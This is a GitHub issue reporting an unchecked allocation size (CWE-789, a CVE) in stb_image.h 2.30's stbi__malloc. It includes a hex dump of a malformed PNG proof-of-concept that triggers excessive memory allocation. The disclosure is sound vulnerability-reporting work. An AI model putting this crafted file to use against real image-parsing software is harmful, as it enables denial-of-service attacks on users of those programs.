Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug: Memory Allocation with Excessive Size Value detected (stb_image.h 2.30) #1757

Open
eastmean0 opened this issue Mar 16, 2025 · 0 comments
Open

Bug: Memory Allocation with Excessive Size Value detected (stb_image.h 2.30) #1757

eastmean0 opened this issue Mar 16, 2025 · 0 comments

Comments

@eastmean0
Copy link

In stb_image.h, *stbi__malloc function doesn't check allocation size. ASan detected CWE-789 bug.

Below is hex value of PoC file.

00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR
00000010: 0000 0041 00fb ff64 1000 0000 00ff 8002  ...A...d........
00000020: 0300 0000 fe49 4441 5478 9ced ddab 0e80  .....IDATx......
00000030: 3010 0041 4af8 ff5f 2e16 4360 0d8f 64c6  0..AJ.._..C`..d.
00000040: d65c 3667 6ada 31e7 5cb8 677d 7b80 3f11  .\6gj.1.\.g}{.?.
00000050: 2b10 2b10 2b10 2b10 2b10 2b10 2b10 2bd8  +.+.+.+.+.+.+.+.
00000060: 2ece c778 648c 2f39 bfd2 6cac 40ac 40ac  ...xd./9..l.@.@.
00000070: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 40ac  @.@.@.@.@.@.@.@.
00000080: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 40ac  @.@.@.@.@.@.@.@.
00000090: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 40ac  @.@.@.@.@.@.@.@.
000000a0: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 40ac  @.@.@.@.@.@.@.@.
000000b0: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 0000  @.@.@.@.@.@.@...
000000c0: 0000 0000 0036 0300 0028 0000 40ac 40ac  .....6...(..@.@.
000000d0: 40ac 40ac 4041 0000 0064 1000 0000 00ff  @.@[email protected]......
000000e0: 8002 40ac 40ac 40ac 40ac 10ac 40ac 40ac  ..@.@.@.@...@.@.
000000f0: 40ac 40ac 40ac 40ac 40ac 40ac 40ac 40ac  @.@.@.@.@.@.@.@.
00000100: 40ac 40ac 40ac 40ac 40ac e0ea f17c 9f63  @.@.@.@.@....|.c
00000110: 1dd8 ac40 ac40 ac40 ac40 ac40 ac40 ac40  ...@.@.@.@.@.@.@
00000120: ac60 0719 5b07 bb33 2186 2d00 0000 0049  .`..[..3!.-....I
00000130: 454e 44ae

MITRE gave a CVE about this bug. (CVE-2025-26180)
@eastmean0 eastmean0 changed the title Bug: Memory Allocation with Excessive Size Value detected (stb_image.h) Bug: Memory Allocation with Excessive Size Value detected (stb_image.h, 2.30) Mar 16, 2025
@eastmean0 eastmean0 changed the title Bug: Memory Allocation with Excessive Size Value detected (stb_image.h, 2.30) Bug: Memory Allocation with Excessive Size Value detected (stb_image.h 2.30) Mar 16, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@eastmean0